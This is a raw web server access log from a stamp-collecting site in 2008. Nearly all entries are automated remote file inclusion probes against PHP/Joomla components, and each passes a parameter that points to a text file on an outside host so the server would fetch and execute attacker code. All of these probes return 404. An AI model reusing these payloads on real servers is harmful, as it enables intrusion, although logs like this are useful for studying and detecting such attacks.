217.20.163.130 - - [29/Jun/2008:20:48:17 -0700] "GET /logs/access_080407.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.mathstamps.com"
217.20.163.130 - - [29/Jun/2008:20:48:30 -0700] "GET /logs/access_080407.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
217.20.163.130 - - [29/Jun/2008:20:48:31 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
217.20.163.130 - - [29/Jun/2008:20:48:31 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
217.20.163.130 - - [29/Jun/2008:20:48:31 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
209.62.118.242 - - [29/Jun/2008:20:50:29 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.real-groups.com/media/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
59.126.172.166 - - [29/Jun/2008:20:50:43 -0700] "GET /logs/access_080609.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.idols.m23.ru/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
59.126.172.166 - - [29/Jun/2008:20:50:44 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.idols.m23.ru/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
59.126.172.166 - - [29/Jun/2008:20:50:46 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.idols.m23.ru/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
61.92.108.68 - - [29/Jun/2008:20:52:15 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.idols.m23.ru/id.txtt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
189.19.255.240 - - [29/Jun/2008:20:53:18 -0700] "GET /logs/access_080505.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.mathstamps.com"
189.19.255.240 - - [29/Jun/2008:20:53:22 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.mathstamps.com"
189.19.255.240 - - [29/Jun/2008:20:54:43 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
64.150.164.61 - - [29/Jun/2008:20:55:37 -0700] "GET /logs/access_080609.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.idols.m23.ru/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
64.150.164.61 - - [29/Jun/2008:20:55:37 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.idols.m23.ru/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
64.150.164.61 - - [29/Jun/2008:20:55:37 -0700] "GET /logs/access_080609.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.idols.m23.ru/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
64.150.164.61 - - [29/Jun/2008:20:55:37 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.idols.m23.ru/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
64.150.164.61 - - [29/Jun/2008:20:55:37 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.idols.m23.ru/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
64.150.164.61 - - [29/Jun/2008:20:55:38 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.idols.m23.ru/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
189.19.255.240 - - [29/Jun/2008:20:57:20 -0700] "GET /logs/access_080407.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
189.19.255.240 - - [29/Jun/2008:20:57:25 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
189.19.255.240 - - [29/Jun/2008:20:57:26 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
64.150.164.61 - - [29/Jun/2008:20:57:42 -0700] "GET /logs/access_080609.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.idols.m23.ru/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
64.150.164.61 - - [29/Jun/2008:20:57:42 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.idols.m23.ru/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
64.150.164.61 - - [29/Jun/2008:20:57:42 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.idols.m23.ru/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
64.150.164.61 - - [29/Jun/2008:20:57:44 -0700] "GET /logs/access_080609.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.idols.m23.ru/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
64.150.164.61 - - [29/Jun/2008:20:57:44 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.idols.m23.ru/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
64.150.164.61 - - [29/Jun/2008:20:57:44 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.idols.m23.ru/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
209.62.118.242 - - [29/Jun/2008:20:57:58 -0700] "GET /logs/access.log/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.real-groups.com/media/id2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
209.62.118.242 - - [29/Jun/2008:20:57:58 -0700] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://www.real-groups.com/media/id2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
209.62.118.242 - - [29/Jun/2008:20:57:58 -0700] "GET /logs/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.real-groups.com/media/id2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
195.34.78.106 - - [29/Jun/2008:20:58:21 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.backbreakacres.com/test1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
209.62.118.242 - - [29/Jun/2008:20:58:34 -0700] "GET /logs/access_080609.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.real-groups.com/media/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
209.62.118.242 - - [29/Jun/2008:20:58:34 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.real-groups.com/media/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
64.150.164.61 - - [29/Jun/2008:21:00:38 -0700] "GET /logs/access.log/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.idols.m23.ru/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
64.150.164.61 - - [29/Jun/2008:21:00:38 -0700] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://www.idols.m23.ru/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
64.150.164.61 - - [29/Jun/2008:21:00:38 -0700] "GET /logs/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.idols.m23.ru/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
209.62.118.242 - - [29/Jun/2008:21:01:06 -0700] "GET /logs/access.log/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.real-groups.com/media/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
209.62.118.242 - - [29/Jun/2008:21:01:06 -0700] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://www.real-groups.com/media/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
209.62.118.242 - - [29/Jun/2008:21:01:06 -0700] "GET /logs/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.real-groups.com/media/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
189.19.255.240 - - [29/Jun/2008:21:01:28 -0700] "GET /logs/access_080407.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.mathstamps.com"
64.150.164.61 - - [29/Jun/2008:21:02:40 -0700] "GET /logs/access.log/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.idols.m23.ru/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
64.150.164.61 - - [29/Jun/2008:21:02:40 -0700] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://www.idols.m23.ru/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
64.150.164.61 - - [29/Jun/2008:21:02:40 -0700] "GET /logs/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.idols.m23.ru/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
64.150.164.61 - - [29/Jun/2008:21:04:27 -0700] "GET /logs/access_080414.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.idols.m23.ru/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
64.150.164.61 - - [29/Jun/2008:21:04:27 -0700] "GET /logs/access_080519.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.idols.m23.ru/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
64.150.164.61 - - [29/Jun/2008:21:04:57 -0700] "GET /logs/access_080414.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.idols.m23.ru/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
64.150.164.61 - - [29/Jun/2008:21:04:57 -0700] "GET /logs/access_080519.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.idols.m23.ru/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
61.92.108.68 - - [29/Jun/2008:21:04:58 -0700] "GET /logs/access_080609.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.idols.m23.ru/id.txtt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
61.92.108.68 - - [29/Jun/2008:21:04:58 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.idols.m23.ru/id.txtt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
87.246.68.51 - - [29/Jun/2008:21:05:14 -0700] "GET /logs/access_080609.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://zondata.com/cache/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.mathstamps.com"
87.246.68.51 - - [29/Jun/2008:21:05:14 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://zondata.com/cache/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.mathstamps.com"
87.246.68.51 - - [29/Jun/2008:21:05:15 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://zondata.com/cache/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.mathstamps.com"
201.130.79.34 - - [29/Jun/2008:21:05:23 -0700] "GET /logs/access_080609.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://zondata.com/cache/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
201.130.79.34 - - [29/Jun/2008:21:05:23 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://zondata.com/cache/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
201.130.79.34 - - [29/Jun/2008:21:05:23 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://zondata.com/cache/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
64.150.164.61 - - [29/Jun/2008:21:06:30 -0700] "GET /logs/access_080414.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.idols.m23.ru/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
64.150.164.61 - - [29/Jun/2008:21:06:31 -0700] "GET /logs/access_080519.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.idols.m23.ru/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
209.62.118.242 - - [29/Jun/2008:21:06:50 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.real-groups.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
64.150.164.61 - - [29/Jun/2008:21:07:00 -0700] "GET /logs/access_080414.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.idols.m23.ru/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
64.150.164.61 - - [29/Jun/2008:21:07:01 -0700] "GET /logs/access_080519.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.idols.m23.ru/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
209.62.118.242 - - [29/Jun/2008:21:09:02 -0700] "GET /logs/access_080414.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.real-groups.com/media/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
209.62.118.242 - - [29/Jun/2008:21:09:04 -0700] "GET /logs/access_080519.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.real-groups.com/media/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
209.62.118.242 - - [29/Jun/2008:21:09:40 -0700] "GET /logs/access_080609.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.real-groups.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
209.62.118.242 - - [29/Jun/2008:21:09:40 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.real-groups.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
195.34.78.106 - - [29/Jun/2008:21:12:51 -0700] "GET /logs/access_080609.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.backbreakacres.com/test1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
195.34.78.106 - - [29/Jun/2008:21:12:51 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.backbreakacres.com/test1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
61.92.108.68 - - [29/Jun/2008:21:14:06 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.idols.m23.ru/id.txtt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
61.92.108.68 - - [29/Jun/2008:21:14:08 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.idols.m23.ru/id.txtt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
74.6.8.118 - - [29/Jun/2008:21:19:15 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.mathstamps.com"
74.6.8.118 - - [29/Jun/2008:21:19:15 -0700] "GET /tmp/ HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.mathstamps.com"
61.92.108.68 - - [29/Jun/2008:21:20:51 -0700] "GET /logs/access_080414.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.idols.m23.ru/id.txtt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
61.92.108.68 - - [29/Jun/2008:21:20:53 -0700] "GET /logs/access_080519.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.idols.m23.ru/id.txtt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
74.200.207.18 - - [29/Jun/2008:21:21:11 -0700] "GET /logs/access_080602.log/joomla/index.php?option=com_restaurante&task=http://www.delcorso.org/images/blank?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
74.200.207.18 - - [29/Jun/2008:21:21:11 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://www.delcorso.org/images/blank?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
74.200.207.18 - - [29/Jun/2008:21:21:11 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.delcorso.org/images/blank?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
74.200.207.18 - - [29/Jun/2008:21:21:19 -0700] "GET /logs/access_080519.log/joomla/index.php?option=com_restaurante&task=http://www.delcorso.org/images/blank?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
74.6.8.118 - - [29/Jun/2008:21:21:52 -0700] "GET /logs/access_080609.log HTTP/1.0" 200 5056968 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.mathstamps.com"
74.200.207.18 - - [29/Jun/2008:21:22:13 -0700] "GET /logs/access.log/joomla/index.php?option=com_restaurante&task=http://www.delcorso.org/images/blank?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
208.180.39.222 - - [29/Jun/2008:21:22:14 -0700] "GET /logs/access_080505.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://dragon.hispared.org/appserv/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
74.200.207.18 - - [29/Jun/2008:21:22:25 -0700] "GET /logs/access_080505.log/joomla/index.php?option=com_restaurante&task=http://www.delcorso.org/images/blank?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
74.200.207.18 - - [29/Jun/2008:21:22:52 -0700] "GET /logs/access_080526.log/joomla/index.php?option=com_restaurante&task=http://www.delcorso.org/images/blank?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
61.92.108.68 - - [29/Jun/2008:21:23:05 -0700] "GET /logs/access_080609.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.idols.m23.ru/id.txtt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
61.92.108.68 - - [29/Jun/2008:21:23:06 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.idols.m23.ru/id.txtt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
61.92.108.68 - - [29/Jun/2008:21:23:09 -0700] "GET /logs/access_080609.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.idols.m23.ru/id.txtt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
61.92.108.68 - - [29/Jun/2008:21:23:09 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.idols.m23.ru/id.txtt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
74.200.207.18 - - [29/Jun/2008:21:23:12 -0700] "GET /logs/access_080421.log/joomla/index.php?option=com_restaurante&task=http://www.delcorso.org/images/blank?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
59.126.172.166 - - [29/Jun/2008:21:23:22 -0700] "GET /logs/access_080519.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.idols.m23.ru/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
74.6.8.118 - - [29/Jun/2008:21:23:51 -0700] "GET /logs/access_080616.log HTTP/1.0" 200 720896 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.mathstamps.com"
195.34.78.106 - - [29/Jun/2008:21:23:59 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.backbreakacres.com/test1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
195.34.78.106 - - [29/Jun/2008:21:23:59 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.backbreakacres.com/test1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
74.200.207.18 - - [29/Jun/2008:21:25:57 -0700] "GET /logs/access_080519.log/joomla/index.php?option=com_restaurante&task=http://www.delcorso.org/images/blank?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
74.200.207.18 - - [29/Jun/2008:21:25:58 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://www.delcorso.org/images/blank?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
74.200.207.18 - - [29/Jun/2008:21:25:58 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.delcorso.org/images/blank?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
74.200.207.18 - - [29/Jun/2008:21:25:59 -0700] "GET /logs/access_080602.log/joomla/index.php?option=com_restaurante&task=http://www.delcorso.org/images/blank?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
74.200.207.18 - - [29/Jun/2008:21:26:14 -0700] "GET /logs/access_080512.log/joomla/index.php?option=com_restaurante&task=http://www.delcorso.org/images/blank?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
74.200.207.18 - - [29/Jun/2008:21:27:40 -0700] "GET /logs/access_080609.log/joomla/index.php?option=com_restaurante&task=http://www.delcorso.org/images/blank?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
74.6.8.118 - - [29/Jun/2008:21:28:57 -0700] "GET /logs/?S=A HTTP/1.0" 200 8215 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.mathstamps.com"
195.34.78.106 - - [29/Jun/2008:21:29:55 -0700] "GET /logs/access_080414.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.backbreakacres.com/test1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
74.6.8.118 - - [29/Jun/2008:21:31:26 -0700] "GET /logs/access_080519.log HTTP/1.0" 200 5693247 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.mathstamps.com"
195.34.78.106 - - [29/Jun/2008:21:35:22 -0700] "GET /logs/access.log/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.backbreakacres.com/test1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
195.34.78.106 - - [29/Jun/2008:21:35:22 -0700] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://www.backbreakacres.com/test1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
195.34.78.106 - - [29/Jun/2008:21:35:23 -0700] "GET /logs/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.backbreakacres.com/test1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
74.200.207.18 - - [29/Jun/2008:21:35:58 -0700] "GET /logs/access_080407.log/joomla/index.php?option=com_restaurante&task=http://www.delcorso.org/images/blank?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
74.200.207.18 - - [29/Jun/2008:21:36:07 -0700] "GET /logs/access_080428.log/joomla/index.php?option=com_restaurante&task=http://www.delcorso.org/images/blank?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
195.34.78.106 - - [29/Jun/2008:21:36:15 -0700] "GET /logs/access_080609.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.backbreakacres.com/test1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
